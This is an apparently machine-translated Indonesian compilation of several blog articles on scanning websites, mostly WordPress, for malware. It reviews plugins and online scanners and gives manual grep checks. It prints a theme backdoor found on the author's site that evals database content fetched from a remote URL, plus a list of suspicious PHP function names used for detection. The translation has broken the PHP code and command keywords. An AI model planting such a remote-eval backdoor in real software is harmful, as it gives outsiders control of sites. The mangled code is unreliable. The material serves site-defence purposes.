Terkadang ada situasi ketika Anda perlu memeriksa situs web dari virus. Ini mungkin diperlukan, misalnya, jika Anda untuk waktu yang lama cari di Internet untuk jawaban atas pertanyaan Anda dan akhirnya menemukannya, tetapi tiba-tiba di mesin pencari Anda menemukan peringatan bahwa situs tersebut dapat mengancam keselamatan Anda. Mereka yang menghabiskan banyak waktu di Internet memahami apa yang saya bicarakan. Bagi Anda yang lain, saya akan mencoba menjelaskan lebih detail apa maksudnya.

Jadi, semua mesin pencari secara teratur memindai dan memeriksa semua situs dari virus dan kode berbahaya. Kapan robot pencari menemukan kode tersebut di sebuah situs, secara otomatis mengeluarkan peringatan dalam pencarian bahwa situs ini dapat mengancam komputer Anda. Namun hal ini tidak selalu benar, karena robot-robot ini dapat membuat kesalahan dan bahkan hal-hal tersebut dapat terjadi kode biasa , Misalnya, tombol sosial

atau JavaScript untuk berbahaya. Dalam situasi seperti ini, muncul pertanyaan wajar. Apakah situs ini layak dikunjungi?
Jika informasi yang Anda minati dapat ditemukan di situs lain, maka situs tersebut, yang terdapat peringatan bahwa ia dapat menyebarkan kode berbahaya atau virus, tentu saja tidak layak untuk dikunjungi. Namun ketika Anda sudah lama mencari informasi yang benar-benar Anda butuhkan dan akhirnya menemukannya, apa yang harus Anda lakukan dalam hal ini? Ini di satu sisi, tetapi di sisi lain, jika Anda adalah pemilik situs web dan suatu hari yang cerah, di akun Yandex atau Google Anda, Anda menemukan peringatan bahwa ada kode berbahaya di situs web Anda? Saya pikir peringatan seperti itu tidak akan meningkatkan mood Anda. Dan apa yang harus dilakukan dalam kasus ini, Bagaimana menemukan kode atau virus berbahaya ini? Program antivirus konvensional sepertinya tidak akan membantu Anda di sini. Untuk kasus ini ada program khusus dan layanan online yang dapat memindai situs dan memeriksa kode berbahaya di situs. Program-program tersebut dan layanan daring
Jika Anda seorang webmaster, maka Anda dapat melakukannya melalui akun Anda di Yandex, Google, dll. meskipun hal ini juga tidak selalu membantu. Misalnya seperti yang terjadi pada saya. Suatu hari, seorang teman saya memberi tahu saya bahwa ketika dia mengunjungi situs web saya, dia utilitas antivirus memberitahunya bahwa ada virus di situs saya. Wajar saja saya langsung mengecek semua akun yang masuk mesin pencari, tempat situs saya terdaftar. Dan di mana-mana ada pesan bahwa tidak ada virus atau dugaan kode berbahaya di situs saya. Ternyata menurut mesin pencari situs saya bersih dan tidak ada malware atau virus. Namun program antivirus teman saya menemukan sesuatu. Dan program semacam itu mungkin tidak hanya diinstal olehnya, tetapi mungkin juga diinstal oleh banyak pengguna Internet lainnya. Dan ternyata setiap orang yang menginstal program seperti itu akan melewati situs saya, dan bukan fakta bahwa mereka akan kembali ke situs ini setelah peringatan tersebut.
Saat itulah saya mulai mencari berbagai program dan layanan online untuk memeriksa situs web untuk mencari kode berbahaya. Seperti yang sudah saya tulis di atas, ada banyak layanan seperti itu di Internet, tetapi pada dasarnya, setelah pemindaian, mereka hanya menampilkan informasi tentang keberadaan kode berbahaya di situs. Artinya, ada kecurigaan atau tidak, itu saja. Misalnya saja seperti layanan ini.

Ada kecurigaan adanya virus dan dikatakan bahwa sisipan iframe ditemukan di situs tersebut. Namun jika melihat kode halamannya, Anda dapat memahami bahwa ini hanyalah kode embed untuk video dari YouTube.

Layanan online kedua untuk memeriksa malware di situs web

Alarm Antivirus - untuk memindai situs yang Anda tentukan, layanan ini menggunakan database antivirus dari perusahaan antivirus terbesar di dunia. Pemindaian penuh berlangsung hingga 10 menit dan tidak berhenti meskipun Anda menutup halaman. Ada juga tautan di sini tempat Anda dapat melihat hasilnya kapan saja. Keunggulan lainnya dari layanan ini adalah berisi daftar virus yang paling sering terdeteksi di situs web. Misalnya seperti ini kode virus iframe asqyt.in:

Ada juga daftar BUKAN virus. Hal ini mencegah Anda untuk terburu-buru panik ketika salah satunya program antivirus kesalahan kode untuk virus.
Misalnya di sini, menurut Google, dia bahkan tidak percaya diri.

Oleh karena itu, kami menarik kesimpulan. Dan pendapat saya adalah bahwa semua layanan ini, tentu saja, sangat berguna dan sangat membantu dalam menemukan kode berbahaya di sebuah situs web. Namun seperti kata pepatah, percaya tetapi verifikasi, jadi Anda perlu memeriksa sendiri setiap informasi yang diberikan oleh layanan ini. Dan tentu saja, tindakan terakhir terserah Anda.

WordPress adalah salah satu yang paling banyak sistem populer manajemen konten, digunakan untuk berbagai tujuan: dari blogging hingga perdagangan elektronik. Ada pilihan luas plugin dan tema untuk WordPress. Kebetulan beberapa ekstensi ini jatuh ke tangan webmaster setelah beberapa penyerang mengerjakannya.

Demi keuntungannya sendiri, dia dapat meninggalkan tautan atau kode iklan di dalamnya yang akan digunakannya untuk mengelola situs Anda. Banyak Pengguna WordPress tidak memiliki banyak pengalaman dalam pemrograman web dan tidak tahu bagaimana harus bertindak dalam situasi seperti ini.

Bagi mereka, saya mengulas sembilan yang paling banyak alat yang efektif untuk mendeteksi perubahan berbahaya pada kode situs web yang sedang berjalan atau add-on yang diinstal.

Pemeriksa Keaslian Tema (TAC) – Plugin WordPress yang memindai setiap tema yang ditetapkan untuk elemen mencurigakan seperti tautan tak terlihat atau kode terenkripsi Base64.

Setelah mendeteksi elemen tersebut, TAC melaporkannya ke administrator WordPress, memungkinkan dia menganalisis secara independen dan, jika perlu, memperbaikinya file sumber topik:

Exploit Scanner memindai semuanya kode sumber konten situs dan database Anda data WordPress untuk adanya inklusi yang meragukan. Sama seperti TAC, plugin ini tidak mencegah serangan atau melawan konsekuensinya modus otomatis.

Itu hanya menunjukkan gejala infeksi yang terdeteksi kepada administrator situs. Jika Anda ingin menghapus kode berbahaya, Anda harus melakukannya secara manual:

Sucuri adalah solusi terkenal di bidangnya Keamanan WordPress. Plugin Sucuri Security memonitor file yang diunggah ke situs WordPress dan menyimpannya daftar sendiri ancaman yang diketahui, dan juga memungkinkan Anda memindai situs dari jarak jauh menggunakan pemindai gratis Pemindai Pemeriksaan Situs Sucuri. Untuk biaya berlangganan Anda dapat lebih memperkuat keamanan situs Anda dengan menginstal yang kuat firewall Firewall Situs Web Sucuri:

Anti-Malware adalah plugin untuk WordPress yang dapat menemukan dan menghapus skrip Trojan, backdoor, dan kode berbahaya lainnya.

Pengaturan pemindaian dan penghapusan dapat disesuaikan. Plugin ini dapat digunakan setelahnya pendaftaran gratis di gotmls.

Plugin ini secara teratur mengakses situs web produsen, mengirimkan statistik deteksi malware dan menerima pembaruan. Oleh karena itu, jika Anda tidak ingin memasang plugin di situs Anda yang memantau operasinya, sebaiknya hindari penggunaan Anti-Malware:

WP Antivirus Site Protection adalah plugin yang memindai semua file yang diunggah ke situs, termasuk tema WordPress.

Plugin ini memiliki database tanda tangannya sendiri, yang secara otomatis diperbarui melalui Internet. Itu dapat menghapus ancaman secara otomatis, beri tahu administrator situs melalui e-mail dan banyak lagi.

Plugin ini diinstal dan berfungsi secara gratis, tetapi memiliki beberapa add-on berbayar yang patut diperhatikan:

AntiVirus untuk WordPress adalah plugin yang mudah digunakan yang dapat memindai situs Anda secara teratur dan memberi tahu Anda tentang masalah keamanan melalui email. Plugin ini memiliki " daftar putih"dan fungsi lainnya:

Pemindai Quterra memeriksa situs web untuk mencari kerentanan, suntikan kode pihak ketiga, virus, pintu belakang, dll. Pemindai memilikinya peluang menarik, seperti pemindaian heuristik, deteksi tautan eksternal.

Fitur pemindai dasar gratis, sementara beberapa lainnya layanan tambahan akan dikenakan biaya $60 per tahun:

Jika Anda mencari solusi komprehensif untuk masalah keamanan situs web Anda, Anda bisa mengunjungi Wordfence.

Plugin ini memberikan perlindungan berkelanjutan untuk WordPress terhadap jenis serangan yang diketahui, otentikasi dua faktor, dukungan untuk “daftar hitam” alamat IP komputer dan jaringan yang digunakan oleh peretas dan spammer, memindai situs untuk mencari pintu belakang yang diketahui.

Plugin ini gratis versi dasar, tetapi juga memiliki fungsionalitas premium, sehingga pabrikan meminta biaya berlangganan yang rendah:

Wemahu memantau perubahan pada kode situs Anda dan mencari kode berbahaya.

Basis data tempat malware terdeteksi diisi ulang menggunakan metode crowdsourcing: pengguna mengisinya sendiri dengan mengirimkan hasil pemindaian instalasi WordPress yang terinfeksi ke situs web pembuat plugin. Plugin ini juga mendukung pengiriman laporan melalui email dan fitur berguna lainnya:

Terjemahan artikel “9 Plugin WordPress Untuk Mendeteksi Kode Berbahaya di Situs Anda” disiapkan oleh tim proyek yang ramah.

Setiap webmaster yang menemukan kode berbahaya di situs webnya menerima banyak pengalaman yang tidak menyenangkan. Pemilik situs segera, dengan panik, mencoba menemukan dan menghancurkan virus tersebut, dan memahami bagaimana hal buruk ini bisa masuk ke situsnya. Namun seperti yang diperlihatkan oleh praktik, menemukan kode berbahaya di situs web tidaklah mudah. Bagaimanapun, virus dapat didaftarkan dalam satu atau beberapa file, dari jumlah yang sangat besar terdiri dari apa situs tersebut, baik itu mesin yang berjalan di WordPress atau situs biasa di html.

Kemarin, saat memeriksa email saya, saya menemukan email dari Google yang mengatakan bahwa kunjungan tersebut halaman tertentu situs saya dapat menyebabkan infeksi pada komputer pengguna perangkat lunak perusak. Sekarang, pengguna yang mengakses halaman ini melalui link di hasil pencarian Google.ru akan diperlihatkan halaman peringatan. Situs ini tidak ditambahkan ke panel saya webmaster Google, jadi saya diberitahu melalui surat. Saya memiliki beberapa situs lagi di panel webmaster; ketika saya membukanya, saya merasa ngeri melihat peringatan tentang kode berbahaya di dua situs saya lagi.
Akibatnya, kode berbahaya menetap di tiga situs saya, yang harus saya temukan dan hancurkan. Salah satu situs berjalan di WordPress, dua lainnya terdiri dari halaman PHP biasa.

Perlu dicatat bahwa Google bereaksi banyak lebih cepat dari Yandex untuk keberadaan kode berbahaya. Di panel webmaster Yandex, peringatan tentang keberadaan virus di situs tidak muncul. Untungnya, dalam beberapa jam saya berhasil menemukan virus malang ini.

Biasanya, situs paling sering terinfeksi oleh apa yang disebut virus iframe. Pada dasarnya, virus ini terdiri dari kode... . Virus mencuri semua kata sandi Jumlah Komandan atau klien ftp lainnya. Dalam kasus saya, hal yang sama terjadi; kode iframe ditulis ke dalam beberapa lusin file di situs saya. Di situs yang berjalan di WordPress, kode berbahaya hanya berhasil menetap di footer.php.

Jadi, bagaimana menemukan kode berbahaya jika ternyata situs Anda terinfeksi:

1. Buka panel kontrol hosting Anda dan ubah kata sandi Anda. Jika Anda memiliki beberapa situs, kami melakukan ini dengan semua situs kami.

2. Ubah dan hapus kata sandi di klien ftp. Kami tidak pernah lagi menyimpan kata sandi di klien ftp; kami selalu memasukkannya secara manual.

3. Anda dapat masuk ke hosting melalui ftp dan melihat apa yang berubah pada file Anda. Urutkan file berdasarkan tanggal perubahan terakhir. File-file yang terinfeksi harus memiliki tanggal terbaru dan sama. Buka file tersebut dan cari kode iframe, biasanya kode ini letaknya paling akhir. Pada dasarnya, kode berbahaya ditulis dalam file berikut: Index.php, Index.html, dan file dengan ekstensi .js. Seringkali, infeksi ini hidup di antara tag... .
Untuk situs yang ditulis sendiri, perhatikan dengan cermat semua file dan folder skrip yang sering kali berisi virus; Selain itu, habitat favorit virus ini ada di kode counter situs, dan di kode iklan.

4. Periksa file .htaccess apakah ada kode yang mencurigakan. Terkadang kode berbahaya menembus file ini. Biasanya, ada beberapa direktori di file mesin tempat file .htaccess dapat ditemukan. Periksa semua file ini dan pastikan kodenya “bersih”.

Sedangkan untuk file WordPress atau CMS lainnya, biasanya CMS apa pun terdiri dari banyak file dan folder, dan sangat sulit untuk menemukan kode berbahaya di dalamnya. Misalnya untuk WordPress saya bisa merekomendasikan plugin TAC. Plugin ini memeriksa file di semua tema di folder tema untuk mencari kode pihak ketiga. Jika TAC menemukan kode yang tidak diinginkan, ia akan menampilkan jalur ke file ini. Dengan demikian, virus yang menutupi dapat dihitung.
Unduh plugin TAC: wordpress.org

Secara umum, Anda harus selalu mengingat semua tindakan yang Anda lakukan dengan file situs Anda. Ingat apa yang diubah atau ditambahkan ke kode ini atau itu.

Setelah Anda menemukan dan menghapus kode berbahaya, tidak ada salahnya untuk memeriksa virus di komputer Anda.
Dan jika situs Anda ditandai oleh Google atau Yandx sebagai terinfeksi, maka Anda perlu mengirimkan permintaan pemeriksaan ulang melalui panel webmaster. Sebagai aturan, mesin pencari harus menghapus semua batasan dari situs Anda dalam waktu 24 jam. Tidak butuh waktu lama bagi Google untuk memproses permintaan verifikasi ulang saya, dan setelah beberapa jam semua pembatasan dihapus dari situs saya.

Halo teman teman. Apakah Anda yakin ini gratis? Templat WordPress, yang Anda gunakan agar situs web dan blog Anda benar-benar aman dan tidak mengandung ancaman tersembunyi dan kode berbahaya? Apakah Anda benar-benar yakin tentang hal ini? Sangat?)

Anda pikir Anda telah menjalankan templat tersebut, menghapus tautan tersembunyi darinya, dan pekerjaan selesai. Anda secara berkala memindai file situs dengan antivirus, melihat alat webmaster Yandex di tab Keamanan dan merasa lega melihat pesan di sana: “ Tidak ada kode berbahaya yang terdeteksi di situs«.

Itu juga yang saya pikirkan. Aku tidak ingin membuatmu kesal, tapi...

Ini adalah surat yang saya terima minggu lalu melalui email dari perusahaan hosting saya. Baru-baru ini mereka memperkenalkan pemeriksaan rutin semua file situs untuk mencari konten berbahaya dan mereka menemukan konten ini di dalam diri saya!

Semuanya dimulai ketika saya mengunjungi situs web saya pada suatu sore dan tidak dapat meluncurkannya - sebuah pesan kasar muncul tentang file yang tidak ditemukan ekstensi php. Setelah sedikit tegang, saya mempelajari isi folder dengan situs di hosting dan segera menemukan masalah - file template saya fuctions.php diubah namanya menjadi function.php.malware, yang sepertinya memberi petunjuk secara ambigu - sebuah antivirus adalah bekerja di sini atau semacamnya) Setelah membuka email, saya menemukan laporan di atas dari hoster.

Hal pertama yang saya lakukan tentu saja adalah memeriksanya berkas ini, mempelajari isinya, memindainya dengan segala jenis antivirus, puluhan layanan pengecekan virus online, dll. — pada akhirnya, tidak ada yang ditemukan, semua orang dengan suara bulat menyatakan bahwa file tersebut sepenuhnya aman. Tentu saja, saya mengungkapkan keraguan saya kepada penghosting dengan mengatakan bahwa Anda telah mengacaukan sesuatu, tetapi untuk berjaga-jaga, saya meminta mereka untuk memberikan laporan tentang deteksi potongan kode berbahaya.

Dan inilah jawaban mereka kepada saya

Saya membuka informasi Google tentang kode ini dan berpikir serius...

Ternyata, ini adalah teknik yang benar-benar tidak sepele yang memungkinkan pihak yang berkepentingan mengirimkan data ke situs Anda dan mengubah konten halaman tanpa sepengetahuan Anda! Jika Anda menggunakan template gratis, saya sangat menyarankan memeriksa fungsi.php Anda untuk kode berikut:

add_filter('isi_itu', '_bloginfo', 10001);
fungsi _bloginfo($isi)(
global $posting;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
kembalikan $co;
) jika tidak, kembalikan $konten;
}

Bahkan dengan pengetahuan saya yang sangat dangkal tentang PHP, jelas bahwa filter tertentu sedang dibuat, terkait dengan variabel global post dan content, yang bertanggung jawab untuk menampilkan konten hanya pada halaman posting blog (kondisi is_single). Sudah mencurigakan bukan? Nah, sekarang mari kita lihat kode apa yang akan ditampilkan di website kita.

Opsi blogoption menarik yang diminta di database juga terlihat sangat mencurigakan. Mari kita pergi ke database kita data MySQL dan temukan tabel di sana bernama wp_options, jika Anda tidak mengubah awalan, maka secara default akan terlihat seperti ini. Dan di dalamnya kami menemukan baris yang kami minati yang disebut blogoption

Sungguh indah! Kami melihat opsi berikut

return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

Itu. Dari situs tertentu (dan situs Rusia, ingatlah) mereka mengembalikan konten yang bisa berisi apa saja! Sejumlah tautan, kode berbahaya, teks yang diubah, dll. Saat Anda mengakses situs itu sendiri, Anda mendapatkan kesalahan akses 403, dan ini tidak mengherankan. Tentu saja, saya juga menghapus opsi ini dari database.

Menurut informasi dari korban, konten persis artikel Anda biasanya dikembalikan hanya dengan satu modifikasi - bukan dengan titik “.” disamarkan dalam teks tautan terbuka! Dan omong-omong, pilihan ini ditulis ke database ketika templat itu sendiri diinstal, dan kemudian kode yang melakukan hal ini berhasil dihancurkan dengan sendirinya. Dan saya hidup dengan sampah seperti itu selama dua tahun, dan tidak ada satu pun antivirus atau layanan yang mendeteksinya untuk saya ancaman ini selama ini. Sejujurnya, saya tidak menyadari apakah trik ini berhasil untuk saya, atau apakah plugin keamanan saya memblokir fitur ini (atau mungkin salah satu pembaruan WordPress menutup lubang ini), namun tetap saja tidak menyenangkan.

Bagaimana Anda menyukai kecanggihan “penerjemah” template kami (atau mereka yang mempostingnya di katalog mereka)? Ini bukan untuk Anda memotong tautan dari footer) Sayang sekali saya tidak ingat dari mana saya mengunduh template saya, itu sudah lama sekali, kalau tidak saya pasti akan menulis beberapa yang penuh kasih sayang. Dan jika saat itu saya memiliki pengalaman yang sama dengan yang saya alami sekarang, saya pasti tidak akan menggunakannya templat gratis, atau sebagai upaya terakhir, saya tidak akan mengunduh dari sumber yang tidak dikenal!

Lebih mudah untuk membeli beberapa template premium resmi seharga 15-20 dolar dan hidup dengan tenang, mengetahui bahwa tidak ada lubang atau tautan terenkripsi di dalamnya, dan bahkan jika ada kerentanan, pengembang pasti akan merilis pembaruan di mana lubang ini akan berada. tertutup. (Omong-omong, Artem baru-baru ini menerbitkan artikel di mana dia berbicara tentang template premium dan bahkan memberikan kode promosi untuk diskon brutal bagi mereka yang tertarik)

WordPress adalah mesin paling populer untuk membuat berbagai situs informasi dan blog. Keamanan situs web Anda lebih dari sekadar keamanan data Anda. Ini jauh lebih penting, karena ini juga merupakan keselamatan semua pengguna yang membaca dan mempercayai sumber daya Anda. Inilah mengapa sangat penting agar situs tersebut tidak terinfeksi virus atau kode berbahaya lainnya.

Kami akan melihat cara melindungi WordPress dari peretasan di salah satu artikel berikut, tetapi sekarang saya ingin memberi tahu Anda cara memeriksa situs WordPress dari virus dan kode berbahaya untuk memastikan semuanya aman.

Opsi pertama yang terlintas dalam pikiran adalah Anda diretas oleh peretas dan memasukkan pintu belakang mereka ke dalam kode situs Anda agar dapat mengirim spam, memasang tautan, dan hal-hal buruk lainnya. Hal ini terkadang terjadi, tetapi ini merupakan kasus yang cukup jarang terjadi jika Anda memperbarui perangkat lunak tepat waktu.

Ada ribuan tema WordPress gratis dan berbagai plugin, dan ini sudah bisa menjadi ancaman. Ini adalah satu hal ketika Anda mengunduh template dari situs WordPress dan hal lain lagi ketika Anda menemukannya di situs sebelah kiri. Pengembang yang tidak bermoral dapat menyematkan berbagai kode berbahaya ke dalam produknya. Risikonya bahkan lebih besar jika Anda mengunduh templat premium secara gratis, di mana peretas, tanpa mengambil risiko apa pun, dapat menambahkan semacam lubang keamanan yang kemudian dapat mereka tembus dan melakukan apa yang mereka perlukan. Inilah sebabnya mengapa memeriksa situs WordPress dari virus sangat penting.

Hal pertama yang perlu Anda perhatikan saat memeriksa situs dari virus adalah Plugin WordPress. Dengan cepat dan mudah, Anda dapat memindai situs Anda dan menemukan area kode mencurigakan yang patut diperhatikan, baik itu di tema, plugin, atau inti Wodpress itu sendiri. Mari kita lihat beberapa plugin paling populer:

Plugin yang sangat sederhana ini memeriksa semua tema yang terpasang di situs Anda untuk melihat apakah tema tersebut mengandung kode berbahaya. Plugin mendeteksi tautan tersembunyi yang dienkripsi menggunakan penyisipan kode base64, dan juga menampilkan informasi rinci tentang masalah yang ditemukan. Seringkali, potongan kode yang ditemukan bukanlah virus, namun berpotensi berbahaya, jadi Anda harus mewaspadainya.

Membuka " Penampilan" -> "TAC" lalu tunggu sampai semua thread tercentang.

Sangat mirip dengan pemindai TOC untuk topik, tetapi menghasilkan lebih banyak informasi rinci. Kemampuan deteksi tautan yang sama kode tersembunyi dan sisipan berbahaya lainnya. Buka saja item Pemindai VIP di bagian alat dan analisis hasilnya.

Mungkin cukup untuk menghapusnya file tambahan misalnya desktop.ini. Atau Anda perlu melihat lebih detail apa yang terjadi pada file yang menggunakan base64.

Plugin ini memungkinkan Anda tidak hanya memindai tema dan inti situs dari virus, tetapi juga melindungi situs dari kata sandi brute force dan berbagai serangan XSS, SQLInj. Pencarian dilakukan berdasarkan tanda tangan dan kerentanan yang diketahui. Beberapa kerentanan dapat diperbaiki di lokasi. Untuk mulai memindai file, buka "Anti-Malvare" di menu samping dan klik "Jalankan Pemindaian":

Sebelum Anda dapat menjalankan pemindaian, Anda perlu memperbarui database tanda tangan Anda.

Ini adalah salah satu plugin paling populer untuk Perlindungan WordPress dan memindai kode berbahaya. Selain pemindai, yang dapat menemukan sebagian besar bookmark kode WordPress, ada perlindungan permanen dari berbagai jenis serangan dan kekerasan kata sandi. Selama pencarian, plugin menemukan kemungkinan masalah dengan berbagai plugin dan tema, melaporkan perlunya memperbarui WordPress.

Buka tab "WPDefence" di menu samping, lalu buka tab "Pindai" dan klik "Mulai Pemindaian":

Pemindaian mungkin memerlukan waktu waktu tertentu, tetapi setelah selesai Anda akan melihat laporan rinci tentang masalah yang ditemukan.

Ini adalah plugin sederhana lainnya yang akan memindai templat situs web Anda untuk mencari kode berbahaya. Kekurangannya adalah hanya template saat ini yang dipindai, tetapi informasi yang ditampilkan cukup detail. Anda akan melihat semua fungsi berbahaya yang ada di tema dan kemudian Anda dapat menganalisis secara detail apakah fungsi tersebut menimbulkan bahaya. Temukan item "AntiVirus" di pengaturan, lalu klik "Pindai templat tema sekarang":

Dianjurkan juga untuk memeriksa integritasnya file WordPress, seandainya virus sudah terdaftar di suatu tempat. Anda dapat menggunakan plugin Pemeriksa Integritas untuk ini. Ia memeriksa semua file inti, plugin dan template untuk perubahan. Di akhir pemindaian, Anda akan melihat informasi tentang file yang diubah.

Ada juga beberapa layanan online yang memungkinkan Anda memeriksa situs WordPress dari virus atau hanya memeriksa templatnya. Berikut beberapa di antaranya:

themecheck.org - Anda mengunduh arsip tema dan dapat melihat semua peringatan tentang kemungkinan fungsi berbahaya yang digunakan di dalamnya. Anda tidak hanya dapat melihat informasi tentang tema Anda, tetapi juga tentang tema lain yang diunggah oleh pengguna lain versi yang berbeda topik. Apapun plugin yang ditemukan dapat ditemukan di situs ini. Penyelidikan tema wordpress juga sangat penting.

virustotal.com adalah sumber terkenal tempat Anda dapat memeriksa situs web atau file templat Anda dari virus.

ReScan.pro - memeriksa situs WordPress dari virus menggunakan layanan ini gratis, analisis statis dan dinamis dilakukan untuk mendeteksi kemungkinan pengalihan, pemindai membuka halaman situs. Memeriksa situs terhadap berbagai daftar hitam.

sitecheck.sucuri.net adalah layanan sederhana untuk memindai situs dan topik dari virus. Ada plugin untuk WordPress. Mendeteksi tautan dan skrip berbahaya.

Tidak ada yang lebih baik dari itu pemeriksaan manual. Linux memiliki utilitas grep luar biasa yang memungkinkan Anda mencari kemunculan string arbitrer dalam folder dengan file. Masih memahami apa yang akan kita cari:

eval - fungsi ini memungkinkan Anda mengeksekusi secara sewenang-wenang kode php, ini tidak digunakan oleh produk yang menghargai diri sendiri; jika salah satu plugin atau tema menggunakan fungsi ini, dengan kemungkinan hampir seratus persen kita dapat mengatakan bahwa ada virus di sana;

• base64_decode - fungsi enkripsi dapat digunakan bersama dengan eval untuk menyembunyikan kode berbahaya, tetapi fungsi tersebut juga dapat digunakan untuk tujuan damai, jadi berhati-hatilah;
• sha1 adalah metode lain untuk mengenkripsi kode berbahaya;
• gzinflate - fungsi kompresi, tujuan yang sama, bersama dengan eval, misalnya, gzinflate(base64_decode(code);
• strrev - membalikkan string yang belum pernah ada sebelumnya, sebagai opsi dapat digunakan untuk enkripsi primitif;
• print - menampilkan informasi ke browser, bersama dengan gzinflate atau base64_decode itu berbahaya;
• file_put_contents - WordPress itu sendiri atau pluginnya masih dapat membuat file di sistem file, tetapi jika tema melakukan hal ini, maka Anda harus waspada dan memeriksa mengapa ia melakukan hal ini, karena virus dapat diinstal;
• file_get_contents - dalam banyak kasus digunakan untuk tujuan damai, tetapi dapat digunakan untuk mengunduh kode berbahaya atau membaca informasi dari file;
• curl - cerita yang sama;
• fopen - membuka file untuk ditulis, Anda tidak pernah tahu untuk tujuan apa;
• sistem - fungsi menjalankan perintah di sistem Linux, jika tema, plugin, atau wordpress melakukan hal ini, kemungkinan besar ada virus;
• symlink - membuat tautan simbolis dalam sistem, mungkin virus mencoba menjadikan yang utama sistem file dapat diakses dari luar;
• copy - menyalin file dari satu lokasi ke lokasi lain;
• getcwd - mengembalikan nama direktori kerja saat ini;
• cwd - mengubah folder kerja saat ini;
• ini_get - mendapat informasi tentang Pengaturan PHP, lebih sering untuk tujuan damai, tetapi Anda tidak pernah tahu;
• error_reporting(0) - menonaktifkan tampilan pesan kesalahan apa pun;
• jendela.top.lokasi.href - fungsi javascript, digunakan untuk pengalihan ke halaman lain;
• diretas - jadi, untuk berjaga-jaga, kami memeriksa, tiba-tiba, peretas itu sendiri memutuskan untuk memberi tahu kami.

Anda dapat menggantinya masing-masing kata terpisah untuk perintah ini:

grep -R "diretas" /var/www/path/to/files/wordpress/wp-content/

Atau gunakan skrip sederhana yang akan mencari semua kata sekaligus:

nilai="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_dapatkan
jendela.top.lokasi.href
menyalin(
evaluasi(
sistem(
tautan simbolis(
kesalahan_pelaporan(0)
mencetak
file_dapatkan_isi(
file_put_isi(
fopen(
diretas"

cd /var/www/path/ke/files/wordpress/wp-content/
$ fgrep -nr --termasuk \*.php "$nilai" *